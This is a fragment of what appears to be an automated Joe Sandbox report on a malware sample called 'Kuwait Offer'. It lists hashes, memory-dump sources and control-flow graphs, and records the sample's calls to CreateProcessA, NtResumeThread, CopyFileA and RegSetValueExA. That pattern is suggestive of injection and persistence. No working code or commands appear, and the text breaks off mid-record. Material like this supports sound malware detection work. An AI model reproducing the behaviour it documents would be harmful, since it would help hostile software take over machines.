                                          • Opcode ID: faa54967d1b905e510cc049bac7770e5d135aa97843e271aa75e161f9308b559
                                          • Instruction ID: 3c8d8775efb59250f950be28d13e9208d5c9f7bf6cbe18f34a4ddf494402ba27
                                          • Opcode Fuzzy Hash: faa54967d1b905e510cc049bac7770e5d135aa97843e271aa75e161f9308b559
                                          • Instruction Fuzzy Hash: 3A31B8B4D05218AFDF10CFA9D880A9EFBF5FB49310F14942AE819B7200C775A946CF94
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0634EB1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 667d16f798490a5f4e1096edbbbb73b68aed86c4ff5ac2ab9335f50fdd4ca494
                                          • Instruction ID: e1a11986c981752f4d5a5d443f292f5fb1a4fa8f735eac5864717e8e6798306f
                                          • Opcode Fuzzy Hash: 667d16f798490a5f4e1096edbbbb73b68aed86c4ff5ac2ab9335f50fdd4ca494
                                          • Instruction Fuzzy Hash: 6231B7B4D052189FDB10CFAAD880AAEFBF0FB49310F10942AE819B7200C775A946CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: h
                                          • API String ID: 0-2439710439
                                          • Opcode ID: 3f17fc76f95014d668dc274bd5c304e1293a9358cd510b1604e5ad9070eb507d
                                          • Instruction ID: 5615c262164e07c73bf443a7461164bcd53098b51f0e17f005757f35ad8633a9
                                          • Opcode Fuzzy Hash: 3f17fc76f95014d668dc274bd5c304e1293a9358cd510b1604e5ad9070eb507d
                                          • Instruction Fuzzy Hash: 9361C671D016298FEB64DF6AC8547D9FBB2BF89310F14C2AAC50DA7254DB305A85CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42f94629ddbbdda990a6154b39fb677bb7038a6c780f9fe0180769c8ac0ef3a5
                                          • Instruction ID: f9baa6837fbc71cc7b578ba83b48f6339616ff0688b7c277168ecd1f1a922743
                                          • Opcode Fuzzy Hash: 42f94629ddbbdda990a6154b39fb677bb7038a6c780f9fe0180769c8ac0ef3a5
                                          • Instruction Fuzzy Hash: 65A2B475A10228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB321DB319E81CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e620dcdaf9497d027509e90e04158a24fbc20d48f71cc8c24e0158850256c1ea
                                          • Instruction ID: cc8cefae90ff475ae294f79dcb256bbdbba6dac0228738fa8c8db0d0e78d8b27
                                          • Opcode Fuzzy Hash: e620dcdaf9497d027509e90e04158a24fbc20d48f71cc8c24e0158850256c1ea
                                          • Instruction Fuzzy Hash: 1E427670B002068FDB59EFA9C59466EFBF6FF88300F148929D65A97381DB34A945CBD0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: efb56ff81ea4df9492978ac3f8a295ec71c2f372d1e8a29e79aa2d3bc930d7d3
                                          • Instruction ID: d075677ef689a6274b7628fa44be015654abc413723a02958b26820a8c0c955c
                                          • Opcode Fuzzy Hash: efb56ff81ea4df9492978ac3f8a295ec71c2f372d1e8a29e79aa2d3bc930d7d3
                                          • Instruction Fuzzy Hash: E232B174A10229CFDBA5DF28C984AA9B7B6FB48310F5081E9D94DA7351DB30AE81CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06026eee2cd5237e555626cebbf9ea4e67386b31c9a473329bdb7104dd69e6d9
                                          • Instruction ID: e2f4cc13ed646a38c9b78410b096b92967851e1bb89c5a9443d0bff53b879181
                                          • Opcode Fuzzy Hash: 06026eee2cd5237e555626cebbf9ea4e67386b31c9a473329bdb7104dd69e6d9
                                          • Instruction Fuzzy Hash: 3AE1E374E05218CFDB64CF69D844BA9BBF6BF89304F11A4AAD90EA7250DB305D85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 873c9fa5397d175e03439043364448d3eec597db27d268bd46c6a798231999e9
                                          • Instruction ID: abeac6c69491921ececdb9bbea8e2752d15bd5292a936cf0c3a4c2be4cdd65d6
                                          • Opcode Fuzzy Hash: 873c9fa5397d175e03439043364448d3eec597db27d268bd46c6a798231999e9
                                          • Instruction Fuzzy Hash: 13E1D274E01218CFEB64CF69D884B99BBF6BF89304F11A4AAD909E7250DB305D85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 254375cce89a102d93ea57f73bc29b66a9fa21237be326dc363c3a40192e2c0f
                                          • Instruction ID: 9014d7088f302ee2f1f090264d66cefc8e17c8573d599ba728909f55b88680bc
                                          • Opcode Fuzzy Hash: 254375cce89a102d93ea57f73bc29b66a9fa21237be326dc363c3a40192e2c0f
                                          • Instruction Fuzzy Hash: D8E1C174E01218CFDB64CF69D884B99BBF2BF49304F11A4AAD90AE7250DB745D85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21121d9876313f2378211ad2045666709402f3a9de39bed78a02065d650b6752
                                          • Instruction ID: 7dc40cbf79817057bb74ace7941cf9a71f8ac3ad273aed0082c2c6286acde91b
                                          • Opcode Fuzzy Hash: 21121d9876313f2378211ad2045666709402f3a9de39bed78a02065d650b6752
                                          • Instruction Fuzzy Hash: 41D10570D04218CFEB68CFA9D884B9EBBF6BF49300F1194A9D809B7651DB745A85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f9b9253120cde60267e220f241e6539f2b9fffea34005567f6bfa5e9f2c8677
                                          • Instruction ID: 47794acd7737c9c48b258925f2cd1aee44b3713aa5f9b080c542b9b00381beb8
                                          • Opcode Fuzzy Hash: 7f9b9253120cde60267e220f241e6539f2b9fffea34005567f6bfa5e9f2c8677
                                          • Instruction Fuzzy Hash: BCD1F274D04229CFEB54DFA9D844BADBBF6BF4A304F1090AAD109AB250CB755D86CF41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0eeaefb6db0bd42a4e01639f46692af82a9d9d11e1ae315b1b97e5ea2cbccaf2
                                          • Instruction ID: ddfd746e38e42fbc15ada3b5ae3d6dd7d6aa88ee9dc635432ef0cea3f7c68eb4
                                          • Opcode Fuzzy Hash: 0eeaefb6db0bd42a4e01639f46692af82a9d9d11e1ae315b1b97e5ea2cbccaf2
                                          • Instruction Fuzzy Hash: 1AD1F274D04229CFEB54DFA5D844BADBBF6BF4A304F1090AAD109A7290CB755D86CF41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f22fcf8a4569992440814d163459fc4f1125fa2daeeb78c89f213f8c43d2ef54
                                          • Instruction ID: 2a21891feee2af5f37dc1593eccd30e14ce7c8944e833bb62b4cbb67ae581e94
                                          • Opcode Fuzzy Hash: f22fcf8a4569992440814d163459fc4f1125fa2daeeb78c89f213f8c43d2ef54
                                          • Instruction Fuzzy Hash: BEC1F570D05218CFEB68CFA9D884B9EBBF6BF49300F1584A9D809B7251DB745A85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2169d7e92736015f1eebe3b3d1e0f6e8767323c6967d8be06fd6b9612d974d8
                                          • Instruction ID: 022037ba1e57df489147e9590b487f4132bb642aecd89ae9e21688799269701b
                                          • Opcode Fuzzy Hash: d2169d7e92736015f1eebe3b3d1e0f6e8767323c6967d8be06fd6b9612d974d8
                                          • Instruction Fuzzy Hash: AAB14970D15218CFEB64DFA9C845BADFBF6BF4A301F1090A9D409A7241DB746985CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05dd221f977e64c12f8fd63ce69c76f9b3de4d3c583769f66e9426e27810694b
                                          • Instruction ID: f26a872aab2dfca313c0c5cc57aa3615e6a2b12cede70b8bb87ec81e6569d9f6
                                          • Opcode Fuzzy Hash: 05dd221f977e64c12f8fd63ce69c76f9b3de4d3c583769f66e9426e27810694b
                                          • Instruction Fuzzy Hash: 60B14770D15218CFEB64DFA9D884BADFBF2BF4A311F1094AAD009A7241DB746985CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8b50210bb6f09161fbfae7b5295fe8eb7936873a0fef97b57e4052fde0aa6af
                                          • Instruction ID: b354044d96f3abdcd164f1233bb418a7bf7b938913675ef57cc3e38d25018695
                                          • Opcode Fuzzy Hash: b8b50210bb6f09161fbfae7b5295fe8eb7936873a0fef97b57e4052fde0aa6af
                                          • Instruction Fuzzy Hash: 3DB1F370E05219CFEB64CFA9D884B9EBBF6BF49300F1184A9D809B7651DB744A85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 555110f9ebc986dc63bce315ea0d5d389dfadff96383d1d3e3e5fcc59d599c67
                                          • Instruction ID: 7dbb60c589865040c938bcd57232fa66c79bbe9e5276915c711093b003ee8d70
                                          • Opcode Fuzzy Hash: 555110f9ebc986dc63bce315ea0d5d389dfadff96383d1d3e3e5fcc59d599c67
                                          • Instruction Fuzzy Hash: C9B1F270E05219CFEB64CFA9D884B9EBBF6BF49300F1184A9D809B7651DB744A85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b9ef882aa01139a653446e672fa53a8858c27282f2f09d4923fc0c00f1979ae
                                          • Instruction ID: 7379fac4fee83f0564d05c404a8beddeaff73c438733581e13cccdbe16fd680f
                                          • Opcode Fuzzy Hash: 7b9ef882aa01139a653446e672fa53a8858c27282f2f09d4923fc0c00f1979ae
                                          • Instruction Fuzzy Hash: EAA1D470E05218CFEB54CFA9D884B9DBBB6BF89344F119469D809A7351EB349985CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9693587a87c33367321b826f6fae3092bb9f29ce8fd7a43bb3857240b8f6984c
                                          • Instruction ID: accb2b3db83991de5fcf152308c59559f87e65e02689c451fb95069ba5e0aa39
                                          • Opcode Fuzzy Hash: 9693587a87c33367321b826f6fae3092bb9f29ce8fd7a43bb3857240b8f6984c
                                          • Instruction Fuzzy Hash: 7F71D974E01208DFDB44DFA9D940AAEBBF6FF89310F108069E419AB355DB34A945CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f32360068a7cf32ee586f75e65b123980dd49bed7462eab40022baf764d73ba
                                          • Instruction ID: dffe999dc15be182b8176f91fd95f12e7f0a55bd8ebae3933373e6172556d3fb
                                          • Opcode Fuzzy Hash: 9f32360068a7cf32ee586f75e65b123980dd49bed7462eab40022baf764d73ba
                                          • Instruction Fuzzy Hash: 4D71C874E01209DFDB44EFA9D940AAEBBF6FF89300F108429D41AAB355DB34A945CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4f4c54b706a7f3b5fb3cf3362739153cb3f9ae168d6fc3fdc049cde7b2de36c
                                          • Instruction ID: a4bc62db49fa095ad0be78390ab1eb8e13901af699a14c8ace840ef9e56ccd1c
                                          • Opcode Fuzzy Hash: c4f4c54b706a7f3b5fb3cf3362739153cb3f9ae168d6fc3fdc049cde7b2de36c
                                          • Instruction Fuzzy Hash: 1E519B74D0A248DFEB51DFA9D4846ADFBF5FF4A304F14606AD406A7291C7356C86CB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f5da77396573c07ea750ffaa7b1aecc366b3cc8da86ca2008f1ddf70e041b3f
                                          • Instruction ID: c22ca9021ecebc90d9bad35977ff09eac82a7ee85d14f7d3dec6e14e03c56a85
                                          • Opcode Fuzzy Hash: 0f5da77396573c07ea750ffaa7b1aecc366b3cc8da86ca2008f1ddf70e041b3f
                                          • Instruction Fuzzy Hash: 1551D474D01208DFDB58CFB9C584A9DBBB2BF89340F208129D805AB364DB359945CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c216a23dfbf578c14a457a35f85435ccf62f614ca3393056ababde4b400aa73b
                                          • Instruction ID: 14ecd344b20ac8b0061c6450cf9623b70ae11f0cbe5356a168bf5772ae9d9650
                                          • Opcode Fuzzy Hash: c216a23dfbf578c14a457a35f85435ccf62f614ca3393056ababde4b400aa73b
                                          • Instruction Fuzzy Hash: 37410574D05208CFEB64CF6AC844BEEFBF6AF89304F1090AAC418A7651D7745985CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57335f28e39a50d9fd0a8eff32a3a580befe1c6909aa2a456b6cd604a68a8189
                                          • Instruction ID: 7e421ea1cf2a8a51c74460309d9f8a74b667ea69f7e7275bca7cf57864120e86
                                          • Opcode Fuzzy Hash: 57335f28e39a50d9fd0a8eff32a3a580befe1c6909aa2a456b6cd604a68a8189
                                          • Instruction Fuzzy Hash: 6F41E6B4D05218CFEBA4DF6AC8047EEFAF6AF89304F10E0AAC519A7651D7745984CF90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 802 634ddf5-634de92 805 634de94-634deab 802->805 806 634dedb-634df03 802->806 805->806 809 634dead-634deb2 805->809 810 634df05-634df19 806->810 811 634df49-634df9f 806->811 812 634deb4-634debe 809->812 813 634ded5-634ded8 809->813 810->811 821 634df1b-634df20 810->821 819 634dfe5-634e07a CreateProcessA 811->819 820 634dfa1-634dfb5 811->820 814 634dec0 812->814 815 634dec2-634ded1 812->815 813->806 814->815 815->815 818 634ded3 815->818 818->813 833 634e083-634e0f9 819->833 834 634e07c-634e082 819->834 820->819 829 634dfb7-634dfbc 820->829 822 634df22-634df2c 821->822 823 634df43-634df46 821->823 824 634df30-634df3f 822->824 825 634df2e 822->825 823->811 824->824 828 634df41 824->828 825->824 828->823 831 634dfbe-634dfc8 829->831 832 634dfdf-634dfe2 829->832 835 634dfcc-634dfdb 831->835 836 634dfca 831->836 832->819 842 634e109-634e10d 833->842 843 634e0fb-634e0ff 833->843 834->833 835->835 837 634dfdd 835->837 836->835 837->832 845 634e11d-634e121 842->845 846 634e10f-634e113 842->846 843->842 844 634e101 843->844 844->842 848 634e131 845->848 849 634e123-634e127 845->849 846->845 847 634e115 846->847 847->845 851 634e132 848->851 849->848 850 634e129 849->850 850->848 851->851
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0634E067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: ab85988958fc1a0dc3fd71212b1d0bb9a6f965fe324ebc56fa154403fe9d77b8
                                          • Instruction ID: 3341790235e7fb4a746726ab1af6426d8d7a75e72bebb27fdaff1f435b1aadeb
                                          • Opcode Fuzzy Hash: ab85988958fc1a0dc3fd71212b1d0bb9a6f965fe324ebc56fa154403fe9d77b8
                                          • Instruction Fuzzy Hash: 42A10274E002188FDB60DFA9C885BEEFBF1BF49300F149169E858A7240DB749985CF85

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 852 634de00-634de92 854 634de94-634deab 852->854 855 634dedb-634df03 852->855 854->855 858 634dead-634deb2 854->858 859 634df05-634df19 855->859 860 634df49-634df9f 855->860 861 634deb4-634debe 858->861 862 634ded5-634ded8 858->862 859->860 870 634df1b-634df20 859->870 868 634dfe5-634e07a CreateProcessA 860->868 869 634dfa1-634dfb5 860->869 863 634dec0 861->863 864 634dec2-634ded1 861->864 862->855 863->864 864->864 867 634ded3 864->867 867->862 882 634e083-634e0f9 868->882 883 634e07c-634e082 868->883 869->868 878 634dfb7-634dfbc 869->878 871 634df22-634df2c 870->871 872 634df43-634df46 870->872 873 634df30-634df3f 871->873 874 634df2e 871->874 872->860 873->873 877 634df41 873->877 874->873 877->872 880 634dfbe-634dfc8 878->880 881 634dfdf-634dfe2 878->881 884 634dfcc-634dfdb 880->884 885 634dfca 880->885 881->868 891 634e109-634e10d 882->891 892 634e0fb-634e0ff 882->892 883->882 884->884 886 634dfdd 884->886 885->884 886->881 894 634e11d-634e121 891->894 895 634e10f-634e113 891->895 892->891 893 634e101 892->893 893->891 897 634e131 894->897 898 634e123-634e127 894->898 895->894 896 634e115 895->896 896->894 900 634e132 897->900 898->897 899 634e129 898->899 899->897 900->900
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0634E067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 815fe338abacf813f277d4b5b9724b9c975db01c1ffaa108dd159be4ea9700c4
                                          • Instruction ID: 07f5df1970d070fb72537e63868f2256a59fc2cfcf6a5bef4d6b0b3ba0da8e9c
                                          • Opcode Fuzzy Hash: 815fe338abacf813f277d4b5b9724b9c975db01c1ffaa108dd159be4ea9700c4
                                          • Instruction Fuzzy Hash: 1FA1F074E002188FDB60DFA9C8857EEFBF1BF49300F14916AE858A7240DB749985CF85

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1185 66206dd-6620753 1189 6620755-6620769 1185->1189 1190 6620799-66207be 1185->1190 1189->1190 1193 662076b-6620770 1189->1193 1194 66207c0-66207d4 1190->1194 1195 6620804-6620873 CopyFileA 1190->1195 1196 6620772-662077c 1193->1196 1197 6620793-6620796 1193->1197 1194->1195 1202 66207d6-66207db 1194->1202 1209 6620875-662087b 1195->1209 1210 662087c-66208de 1195->1210 1199 6620780-662078f 1196->1199 1200 662077e 1196->1200 1197->1190 1199->1199 1203 6620791 1199->1203 1200->1199 1204 66207fe-6620801 1202->1204 1205 66207dd-66207e7 1202->1205 1203->1197 1204->1195 1207 66207eb-66207fa 1205->1207 1208 66207e9 1205->1208 1207->1207 1211 66207fc 1207->1211 1208->1207 1209->1210 1216 66208e0-66208e4 1210->1216 1217 66208ee-66208f2 1210->1217 1211->1204 1216->1217 1218 66208e6 1216->1218 1219 6620902 1217->1219 1220 66208f4-66208f8 1217->1220 1218->1217 1222 6620903 1219->1222 1220->1219 1221 66208fa 1220->1221 1221->1219 1222->1222
                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06620863
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: eabc8c761fdd6f02847927212d4ec58bc83c519d8cb388fe5f748473ffef0b60
                                          • Instruction ID: 821860dbd169efb335b4864f1b1d0cc29639b654160df31dfa4a14fa6332c467
                                          • Opcode Fuzzy Hash: eabc8c761fdd6f02847927212d4ec58bc83c519d8cb388fe5f748473ffef0b60
                                          • Instruction Fuzzy Hash: 706125B4D007199FEF50CFA9C8457EEBBB1FB09310F148129E815A7281DB789985CF81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1223 66206e8-6620753 1225 6620755-6620769 1223->1225 1226 6620799-66207be 1223->1226 1225->1226 1229 662076b-6620770 1225->1229 1230 66207c0-66207d4 1226->1230 1231 6620804-6620873 CopyFileA 1226->1231 1232 6620772-662077c 1229->1232 1233 6620793-6620796 1229->1233 1230->1231 1238 66207d6-66207db 1230->1238 1245 6620875-662087b 1231->1245 1246 662087c-66208de 1231->1246 1235 6620780-662078f 1232->1235 1236 662077e 1232->1236 1233->1226 1235->1235 1239 6620791 1235->1239 1236->1235 1240 66207fe-6620801 1238->1240 1241 66207dd-66207e7 1238->1241 1239->1233 1240->1231 1243 66207eb-66207fa 1241->1243 1244 66207e9 1241->1244 1243->1243 1247 66207fc 1243->1247 1244->1243 1245->1246 1252 66208e0-66208e4 1246->1252 1253 66208ee-66208f2 1246->1253 1247->1240 1252->1253 1254 66208e6 1252->1254 1255 6620902 1253->1255 1256 66208f4-66208f8 1253->1256 1254->1253 1258 6620903 1255->1258 1256->1255 1257 66208fa 1256->1257 1257->1255 1258->1258
                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06620863
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: a8d27fb90943ef9bc118781463a634428bb6953abb75a018e7f6534d50fb3912
                                          • Instruction ID: 76d34ace0cb1dc257a28daad2ac8e62e539f832a5100b5c5708833542daeb2d9
                                          • Opcode Fuzzy Hash: a8d27fb90943ef9bc118781463a634428bb6953abb75a018e7f6534d50fb3912
                                          • Instruction Fuzzy Hash: D46103B4D007299FEF50CFA9C8457EEBBB1BB09310F148529E855A7281D7789985CF80

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1259 6620bbc-6620c44 1262 6620c46-6620c5a 1259->1262 1263 6620c8a-6620cbf 1259->1263 1262->1263 1268 6620c5c-6620c61 1262->1268 1266 6620cc1-6620cd3 1263->1266 1267 6620cd6-6620d38 RegSetValueExA 1263->1267 1266->1267 1274 6620d41-6620da2 1267->1274 1275 6620d3a-6620d40 1267->1275 1269 6620c63-6620c6d 1268->1269 1270 6620c84-6620c87 1268->1270 1272 6620c71-6620c80 1269->1272 1273 6620c6f 1269->1273 1270->1263 1272->1272 1276 6620c82 1272->1276 1273->1272 1281 6620db2 1274->1281 1282 6620da4-6620da8 1274->1282 1275->1274 1276->1270 1284 6620db3 1281->1284 1282->1281 1283 6620daa 1282->1283 1283->1281 1284->1284
                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 06620D28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: 7c478d1f92f483b0134122d6117e09e9c84b7ae3c08d36b7b4e8c912fe472433
